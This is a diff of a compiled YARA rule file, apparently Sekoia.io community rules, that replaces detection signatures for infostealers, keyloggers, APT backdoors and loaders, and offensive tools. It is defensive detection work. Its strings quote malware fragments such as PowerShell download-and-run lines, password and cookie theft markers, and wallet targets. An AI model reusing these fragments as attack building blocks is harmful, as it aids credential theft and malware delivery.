+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and all of them
 }
-rule SEKOIA_Infostealer_Win_Stormkitty : FILE
+rule SEKOIA_Apt_Kimsuky_Malicious_Gotopwsh_Lnk : FILE
 {
 	meta:
-		description = "Finds StormKitty samples (or their variants) based on specific strings"
+		description = "Detects malicious LNK used by Kimsuky"
 		author = "Sekoia.io"
-		id = "5014d2e5-af5c-4800-ab1e-b57de37a2450"
-		date = "2023-03-29"
+		id = "cfe9adf5-2c06-4d04-8006-c4eea0dab549"
+		date = "2023-09-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_stormkitty.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "57a4603faf6af9742db79f9bc8751f3a5c091b6271998434f0a3b9f5c30cb1e8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_malicious_gotopwsh_lnk.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1537ea232e745b1ed9e4b7f6b9ba779a3498f5edf0c46bdccfdc511137b2bb3a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246378,37 +246899,24 @@ rule SEKOIA_Infostealer_Win_Stormkitty : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$sk01 = "LimerBoy/StormKitty" ascii wide
-		$sk02 = "StormKitty-Latest.log" wide
-		$sk03 = "StormKitty.exe" ascii
-		$sk04 = "Debug\\StormKitty.pdb" ascii
-		$sk05 = "StormKitty.Implant" ascii
-		$str01 = "set_sUsername" ascii
-		$str02 = "set_sIsSecure" ascii
-		$str03 = "set_sExpMonth" ascii
-		$str04 = "WritePasswords" ascii
-		$str05 = "WriteCookies" ascii
-		$str06 = "sChromiumPswPaths" ascii
-		$str07 = "sGeckoBrowserPaths" ascii
-		$str08 = "Username: {1}" wide
-		$str09 = "Password: {2}" wide
-		$str10 = "encrypted_key\":\"(.*?)\"" wide
+		$ = {67 00 6f 00 74 00 6f 00 26 00 70 00 5e 00 6f 00 77 00 5e 00 65 00 5e 00 72 00 73 00 5e 00 68 00 65 00 5e 00 6c 00 5e 00 6c}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( 1 of ( $sk* ) and 3 of ( $str* ) ) or 7 of ( $str* ) )
+		uint32be( 0 ) == 0x4c000000 and all of them
 }
-rule SEKOIA_Loader_Fakebat_Powershell_Fingerprint_May24 : FILE
+rule SEKOIA_Apt_Evasive_Panda_Rphost_Dll : FILE
 {
 	meta:
-		description = "Finds FakeBat PowerShell script fingerprinting the infected host."
+		description = "Detects DLL used by Evasive Panda"
 		author = "Sekoia.io"
-		id = "7efcf9cf-78fe-400e-abe3-6955c394e358"
-		date = "2024-06-21"
+		id = "8d70639d-b736-4823-86ad-37f0e383b5f7"
+		date = "2024-03-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_fakebat_powershell_fingerprint_may24.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "04e5c888e5f71873c4fa2d732fbd8e40be3edf406300e65e489e1fa378028c5f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_evasive_panda_rphost_dll.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "fa44028115912c95b5efb43218f3c7237d5c349f"
+		logic_hash = "2132f1c69db8fd5793c858ada2443fdfa1f941e68d24cc337766df99f8b3a895"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246416,111 +246924,119 @@ rule SEKOIA_Loader_Fakebat_Powershell_Fingerprint_May24 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Get-WmiObject Win32_ComputerSystem" ascii
-		$str02 = "-Class AntiVirusProduct" ascii
-		$str03 = "status = \"start\"" ascii
-		$str04 = " | ConvertTo-Json" ascii
-		$str05 = ".FromXmlString(" ascii
-		$str06 = " = Invoke-RestMethod -Uri " ascii
-		$str07 = ".Exception.Response.StatusCode -eq 'ServiceUnavailable'" ascii
-		$str08 = "Invoke-WebRequest -Uri $url -OutFile " ascii
-		$str09 = "--batch --yes --passphrase-fd" ascii
-		$str10 = "--decrypt --output" ascii
-		$str11 = "Invoke-Expression \"tar --extract --file=" ascii
+		$s1 = "htks.ini" ascii fullword
+		$s2 = "MyDemo" wide fullword
 
 	condition:
-		7 of them and filesize < 10KB and true
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 1MB
 }
-
-rule SEKOIA_Backdoor_Win_Kimsuky : FILE
+rule SEKOIA_Tool_Rubeus_Strings : FILE
 {
 	meta:
-		description = "Detect the backdoors used by Kimsuky based on specific PE ressources"
+		description = "Detects Rubeus"
 		author = "Sekoia.io"
-		id = "db927d1c-34cf-4501-a6ce-3e8ecdefc5a3"
-		date = "2024-06-04"
+		id = "df1860d0-ec34-4c2d-bd83-5f16b26d075c"
+		date = "2024-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_kimsuky.yar#L4-L38"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ba40427f7e305a6e6cec6bb0165b49e6ce215ecf66fc2e05954c10e4d9acf9b0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_rubeus_strings.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "adc6a5207bb15c8020ca170564ea9066b2c0b0e09839d6838744c623f59153cf"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "000e2926f6e094d01c64ff972e958cd38590299e9128a766868088aa273599c7"
-		hash2 = "cca1705d7a85fe45dce9faec5790d498427b3fa8e546d7d7b57f18a925fdfa5d"
+
+	strings:
+		$ = ".Ndr.RPC_DISPATCH_TABLE32"
+		$ = ".Ndr.RPC_PROTSEQ_ENDPOINT32"
+		$ = ".Ndr.RPC_SERVER_INTERFACE32"
+		$ = ".Ndr.NDR_EXPR_DESC32"
+		$ = "$krb5tgs${0}$*{1}${2}${3}*${4}${5}" wide
+		$ = "$krb5asrep$23${0}@{1}:{2}" wide
+		$ = "Unable to decrypt the EncTicketPart using key:" wide
+		$ = "[*] Target service  : {0:x}" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ac9ed305c6dac749163db359736e7d92fca9173ff5c9e1f021d500b306e3c5ec" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "0ca965ccf7324b098da617909d38986c1e6aae3e12d9629975f1815ed4ed3907" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "25d79e59a6b625e5c22ccb55cc49373d38cc6f20cb75504b0df1bc0804bb1247" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce5619ffe04ec569bf2565e0964156378bda7c42eb646bedbac2191a5af7bebf" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce10e65f7bf105fc06005340f0a8eaea9b351f3750d2818c1cf2ca25a7f495be" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "5a9e2a392c530ab8b38ff917ae0f28496107f1bde94e89515931fd29a0bfb2e5" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "19f4f3a05b809d8e33bb0004f62899ca5f9eac7e4cdba68dfd5c0a6f2d71bec3" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b9c208b9bada7bac4d5bfe53992f570e34e0b4d5cfa0862de9847ddf5630ab9a" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ac9ed305c6dac749163db359736e7d92fca9173ff5c9e1f021d500b306e3c5ec" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "0ca965ccf7324b098da617909d38986c1e6aae3e12d9629975f1815ed4ed3907" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "25d79e59a6b625e5c22ccb55cc49373d38cc6f20cb75504b0df1bc0804bb1247" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce5619ffe04ec569bf2565e0964156378bda7c42eb646bedbac2191a5af7bebf" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce10e65f7bf105fc06005340f0a8eaea9b351f3750d2818c1cf2ca25a7f495be" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "5a9e2a392c530ab8b38ff917ae0f28496107f1bde94e89515931fd29a0bfb2e5" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "19f4f3a05b809d8e33bb0004f62899ca5f9eac7e4cdba68dfd5c0a6f2d71bec3" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b9c208b9bada7bac4d5bfe53992f570e34e0b4d5cfa0862de9847ddf5630ab9a" )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
 }
 
-rule SEKOIA_Merlin_Win_Dll : FILE
+rule SEKOIA_Backoor_Win_Gobear
 {
 	meta:
-		description = "Detects Merling agent (DLL)"
+		description = "Detect the GoBear backdoor used by Kimsuky"
 		author = "Sekoia.io"
-		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be5"
-		date = "2022-01-03"
+		id = "f922bf1b-652e-4a2f-91e9-76ecd2e3bf6a"
+		date = "2024-02-13"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/merlin_win_dll.yar#L4-L42"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "eefaed10bd3accc884673437a1cc6b8c503db4ef797e58bd95daec36a297c4be"
+		reference = "https://medium.com/s2wblog/kimsuky-disguised-as-a-korean-company-signed-with-a-valid-certificate-to-distribute-troll-stealer-cfa5d54314e2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backoor_win_gobear.yar#L4-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8ca2699058ded62cbf4b78040985a4e5ebce0a1ff94034206c81a4c8e91f479b"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$s1 = ".CRT" ascii
-		$s2 = ".tls" ascii
-		$s3 = "github.com/Ne0nd0g/merlin" ascii
-		$s4 = "github.com/lucas-clemente" ascii
-		$s5 = "SendMerlinMessage" ascii
-
 	condition:
-		uint16( 0 ) == 0x5A4D and pe.imphash ( ) == "da7f8acb6151c95be088a02465d68ef8" and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "491d9a18aea3d0eb3653fdaf0b9b86bb" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d41d8cd98f00b204e9800998ecf8427e" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "bf619eac0cdf3f68d496ea9344137e8b" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ce7969c1e894363133e386361be064e5" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c6179cdcd9ba0758a18a1280f98062eb" ) and all of them and $s1 at 712 and $s2 at 752 and filesize < 15MB
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "668031f53390dc749971888029911c12d4171534f77c17a962e698bf121d0e20" )
 }
-rule SEKOIA_Keylogger_Win_Donot
+rule SEKOIA_Pe_Stealer_Scarletstealer_Strings : FILE
 {
 	meta:
-		description = "Detect the DoNot's keylogger malware"
+		description = "ScarletStealer strings"
 		author = "Sekoia.io"
-		id = "4f67dda7-da68-4496-a8b4-a8a769ddd763"
-		date = "2023-03-20"
+		id = "ca930851-513f-44e5-abb4-ca0edfde3428"
+		date = "2023-12-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/keylogger_win_donot.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "eb935f84335e934346511b4108f70df469deef6ecaaba809c144197c04a28f64"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/pe_stealer_scarletstealer_strings.yar#L1-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "308055cbe960614112682585b5709a62c2639752df07661d6b2bb13e390b3b08"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "iwrct2mTFAu0ew1nyqQgoaNtNo0+52R0XiTKbwy1W48Bn1b2YcNt0+tptyY6oGoAeLDGekM/yHcdikNGi8bLqkUQ8CIdkWeT3QiympOTfjs="
-		$ = "ZmVwZW9kbWZ2c24ucHMuZ3h4LngweXBvdWpkYm1qcXE7YnFmVXp1LmZvb3VEcA=="
+		$s1 = "Scarlet Client" wide
+		$s2 = "] PC NAME:   (" wide
+		$s3 = "] IP:   (" wide
+		$s4 = " - Wallets -" wide
+		$s5 = "] Exodus:  (" wide
+		$s6 = "] Electrum:  (" wide
+		$s7 = "] Atomic:  (" wide
+		$s8 = "] Guarda:  (" wide
+		$s9 = "] Coinomi: (" wide
+		$s10 = "] Monero:  (" wide
+		$s11 = "] Ledger:  (" wide
+		$s12 = "] Bitbox:  (" wide
+		$s13 = "] Trezor:  (" wide
+		$s14 = ") Support: PointX@exploit.im - @isPointX" wide
+		$a2 = "/config/tk.txt" wide
+		$a3 = "/config/chatid.txt" wide
+		$a1 = "telebyt.com" wide
 
 	condition:
-		1 of them
+		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 2MB and 13 of ( $s* ) and 2 of ( $a* )
 }
-rule SEKOIA_Apt_Boldmove_Strings : FILE
+rule SEKOIA_Apt_Aptk47_Asyncshell : FILE
 {
 	meta:
-		description = "Detects BOLDMOVE via strings"
+		description = "Detects APT-K-47's Asyncshell"
 		author = "Sekoia.io"
-		id = "0458e282-f92f-4600-964a-de6b66b4a82d"
-		date = "2023-01-16"
+		id = "2d009cf4-e30e-406d-8860-03b37a396ffa"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_boldmove_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "71649451b88629da1779c0856b2f1f60f87501962c69556f7943b049688a2d96"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_aptk47_asyncshell.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "ce6a589d5e3604112e5595a1f8d53e1e"
+		hash = "751f427da8e11d8ab394574260735220"
+		logic_hash = "ac202f7dc317d17118badf71c32776c5666eea4a47e1b439a287b6b8766e9da6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246528,27 +247044,28 @@ rule SEKOIA_Apt_Boldmove_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "cwd=%s" ascii wide
-		$s2 = "executable=%s" ascii wide
-		$s3 = "curl/6.12.34" ascii wide
-		$s4 = "www.example.com" ascii wide
-		$s5 = "GET /ws HTTP/1.1" ascii wide
+		$ = "Error executing command:" wide
+		$ = "Error occurred:" wide
+		$ = "Attempting to reconnect in {0} seconds..." wide
+		$ = "Exiting the application." wide
+		$ = "Server disconnected." wide
+		$ = "_CorExeMain"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and 4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Apt_Muddywater_Powgoop_Decoded : FILE
+rule SEKOIA_Apt_Badmagic_Ld_Dll_Loader_Pshscript : FILE
 {
 	meta:
-		description = "Detects decoded PowGoop malware"
+		description = "Detects BadMagic DLL Loader powershell script"
 		author = "Sekoia.io"
-		id = "194cb9ef-da96-42b6-a3b5-b0aee7495f2c"
-		date = "2022-01-13"
+		id = "d4a23afc-693f-4fab-b2c4-15eecba047f7"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_powgoop_decoded.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6654d8107bb2ad6344f1fa03c6525ed9a0b8e49627787355efe857e80a02eca4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_ld_dll_loader_pshscript.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8482521fe1f90c008948e551df35448b870145cf8b58f3c5019cafb66bb0ae36"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246556,65 +247073,58 @@ rule SEKOIA_Apt_Muddywater_Powgoop_Decoded : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$h1 = "[System.Net.WebRequest]::Create(" ascii wide
-		$h2 = "Headers.Add('Authorization'" ascii wide
-		$h3 = "Headers.Add('Cookie',('value=' + $ec + ';')" ascii wide
-		$h4 = ".GetResponse()" ascii wide
-		$h5 = "GetResponseStream()" ascii wide
-		$c1 = "return (65..90) + (97..122) | Get-Random -Count" ascii wide
-		$c2 = "% {[char]$_}" ascii wide
+		$ = "$ModulePath = \"$folder_path\\$name"
+		$ = "$ModuleExport ="
+		$ = "start-job -ScriptBlock $ScriptBlock"
+		$ = "Invoke-WebRequest -Uri"
 
 	condition:
-		filesize > 1KB and filesize < 1MB and ( $h2 in ( @h1 .. @h5 ) and $h3 in ( @h1 .. @h5 ) and $h4 in ( @h1 .. @h5 ) ) or ( $c2 in ( @c1 .. @c1 + 50 ) ) and true
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Apt_Kimsuky_Klogexe : FILE
+rule SEKOIA_Tool_Win_Lightrail : FILE
 {
 	meta:
-		description = "Detects KLogExe, a keylogger used by Kimsuky"
+		description = "Detect the LIGHTRAIL tunneler used by UNC1549"
 		author = "Sekoia.io"
-		id = "f6e3b1a5-43b6-4dac-83c2-a365c41de38d"
-		date = "2024-09-27"
+		id = "39259f2c-11fe-4edd-8a9e-f36920132272"
+		date = "2024-02-29"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_klogexe.yar#L1-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "e1d683ee1746c08c5fff1c4c2b3b02f0"
-		hash = "90946c6358eacd119fe1eb36ec7a0a18"
-		hash = "9760f489a390665b5e7854429b550c83"
-		logic_hash = "4b616908ceacd85c5d8b527cd1a718082c709071dc1fa9c9ccc96e71dc4e7449"
+		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_win_lightrail.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "84491bf7e955930c04e96f63ffb8c8f35ad02d9a917eceb727bf87c9ed3d831e"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e7ddab967b0487827db069833221aa2fe4ca05f7cda976cbc528ecb306a22774"
+		hash2 = "4ecd511d9654f7fd66a61eb4ab6d7153040b5092d1594ff39935f01fbdbd4914"
+		hash3 = "3472bc8ed6182eb17811c97ada7ebd48034ad09b6a7062b341fe09818d7a309f"
+		hash4 = "ec7b97092278123f0c0613c5f9252eeccf55265d4aa5f2cfed57a63ebf3530ac"
+		hash5 = "8f3757b8f5888a1303af71cbc1a106927d3d6c45552ee192c3ed0347804c2194"
+		hash6 = "8b47b5ed1ed7afcc9194e1350d4e1996bd91ca3204747b586f309f4609a1a4cc"
 
 	strings:
-		$event = "Norton_BreakHelper" ascii wide
-		$log = "------ %d/%d/%d : %d/%d ------" ascii wide
-		$keylog_1 = "[RM+]"
-		$keylog_2 = "[Tab+]"
-		$keylog_3 = "[Home+]"
-		$keylog_4 = "[End+]"
-		$keylog_5 = "[clip_s]: %s "
-		$keylog_6 = "%s[Too many clip_tail]"
-		$keylog_7 = "%s[F%d]"
-		$user_agent = "Chrome/31.0." wide
+		$s1 = "lastenzug.dll"
+		$s2 = "Lastenzug.dll"
+		$azure = ".cloudapp.azure.com" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 600KB and 8 of them
+		uint16be( 0 ) == 0x4d5a and 1 of ( $s* ) and $azure
 }
-rule SEKOIA_Apt_Scanbox_Obfuscated_Versions : FILE
+rule SEKOIA_Dropper_Win_Konni_Cab : FILE
 {
 	meta:
-		description = "Detects obfuscated versions of the scanbox framework"
+		description = "Detect the CAB files used to drop the KONNI malware"
 		author = "Sekoia.io"
-		id = "2866cead-7f16-4895-80ef-aad6fb66e864"
-		date = "2022-09-01"
+		id = "87a209d5-667a-4a81-837a-660ab98c33c8"
+		date = "2023-09-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_scanbox_obfuscated_versions.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0395d1ac9a593aa8249f6d16c485e431349cecf2f379d2b5bac466541f71968c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/dropper_win_konni_cab.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b49bb875d5ddd4b815da5bd184ec7f1d23cfb7ad316760c9a9876607245d0a95"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246622,28 +247132,26 @@ rule SEKOIA_Apt_Scanbox_Obfuscated_Versions : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$_$_$_$__$_____$__$_$_$_$__$"
-		$ = "NztCm_NcDkh"
-		$ = "____$_$__$__$_______w____$_$__$__$_____i____$_$__$__$_____"
-		$ = "391,379,398,381,386"
-		$ = "plguinurl"
-		$ = "plugin_timeout*1000"
+		$magic = "MSCF"
+		$file2 = "check.bat"
+		$file3 = "wpnprv64.dll"
+		$file4 = "wpnprv32.dll"
 
 	condition:
-		2 of them and filesize < 500KB
+		$magic at 0 and all of ( $file* )
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_8 : FILE
+rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects Muddys manifestation JScript backdoor"
 		author = "Sekoia.io"
-		id = "e28a1cd3-f7b6-4a55-8229-484e0bbeb7cb"
-		date = "2023-02-03"
+		id = "998fb0ab-73ed-41e5-b87e-f987b8f05a8c"
+		date = "2022-01-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_8.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "71e4eb41968818e1dd484a259af9eec30a517423b00da75ce21773bf695cbc7d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_manifestation_backdoor.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "477ed53ccd337dd21ab84b7d36b995a653d0aad6676e02cbe5e9f581bface253"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246651,58 +247159,59 @@ rule SEKOIA_Generic_Sharpshooter_Payload_8 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Private Function decodeHex(hex)"
-		$ = "Dim serialized_obj"
-		$ = "decodeHex = EL.NodeTypedValue"
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
+		$s1 = "/^\\s+|\\s+$/g" ascii
+		$l2 = "while (1) {" ascii
+		$l3 = { 57 53 63 72 69 70 74 2e 73 6c 65 65 70 28 ?? ?? 20 2a 20 31 30 30 30 29 3b }
+		$s4 = ")+ key , false)" ascii
+		$s5 = ")+ data , false)" ascii
 
 	condition:
-		all of them and filesize < 2MB
+		filesize > 1000 and ( $l3 in ( @l2 .. @l2 + 300 ) ) and ( any of ( $s* ) )
 }
-rule SEKOIA_Storm_1811_Screenconnect_Update
+
+rule SEKOIA_Yara_Runascs : FILE
 {
 	meta:
-		description = "Detects files used in a campaign performed by the intrusion set Storm-1811"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "252ef24a-14dc-41e8-ba91-dcb9b6deb428"
-		date = "2024-06-11"
+		id = "1720f042-2cc6-4ef1-b66c-fe8a4214366a"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/storm_1811_screenconnect_update.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ad61e28566375fd3c029df79e1b608aac921ab8121a43bd01314c9112197c32e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/yara_runascs.yar#L3-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
